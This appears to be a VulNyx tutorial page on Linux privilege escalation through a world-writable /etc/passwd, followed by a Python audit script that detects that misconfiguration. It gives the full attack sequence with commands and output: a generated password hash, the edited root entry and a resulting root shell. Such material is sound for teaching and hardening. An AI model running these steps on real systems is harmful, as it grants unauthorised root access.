🐧 Privilege Escalation (Linux)

/etc/passwd (Writable)

If a low-privileged user has write permission on the /etc/passwd file, an attacker can replace the x in the password field of the root line (the :x: between the first two colons) with a password hash.
The x tells the system to look the hash up in /etc/shadow; once it is replaced by a hash, that user's authentication is performed against /etc/passwd instead of /etc/shadow.

Check Permissions

low@vulnyx:~$ ls -l /etc/passwd
-rw----rw- 1 root root 1395 abr 21 20:16 /etc/passwd

Create Hash

root@kali:~# openssl passwd -1 "P@ssword123"
$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0

Add Hash

# before
low@vulnyx:~$ cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash

# after
low@vulnyx:~$ cat /etc/passwd |grep root
root:$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:0:0:root:/root:/bin/bash

Authenticate

low@vulnyx:~$ su -
Password:

root@vulnyx:~# id
uid=0(root) gid=0(root) grupos=0(root)
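
From the defender's side, the two conditions this page relies on (write bits for group or others on the file, and a hash in the password field instead of x) can be audited as below. This is an added example, not code from the original page; the function names check_entries and check_file, the expected_uid parameter and the SAMPLE list are assumptions made for illustration.

```python
import os
import stat

# Password-field values that hold no usable hash: "x" defers to /etc/shadow,
# a leading "*" or "!" marks a locked account.
def check_entries(lines):
    """Return findings for passwd-format lines (name:pw:uid:gid:gecos:home:shell)."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"{name}: empty password field")
        elif pw != "x" and not pw.startswith(("*", "!")):
            findings.append(f"{name}: hash stored in passwd instead of shadow")
        if uid == "0" and name != "root":
            findings.append(f"{name}: additional uid 0 account")
    return findings

def check_file(path="/etc/passwd", expected_uid=0):
    """Return findings for ownership, mode bits and entries of a passwd file."""
    st = os.stat(path)
    findings = []
    if st.st_uid != expected_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: {stat.filemode(st.st_mode)} is writable by group or others")
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(check_entries(fh))
    return findings

# Constructed sample: the second line is the modified root entry shown on this page.
SAMPLE = [
    "root:x:0:0:root:/root:/bin/bash",
    "root:$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:0:0:root:/root:/bin/bash",
    "low:x:1000:1000::/home/low:/bin/bash",
]

if __name__ == "__main__":
    for finding in check_file():
        print(finding)
```

A clean system prints nothing; the expected state of the file is owner root with mode -rw-r--r--.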

Disclaimer

WARNING

All techniques presented in this blog are for educational and ethical purposes.
The VulNyx team is not responsible for any misuse or damage caused to third party systems or infrastructure.



© VulNyx 2023-2025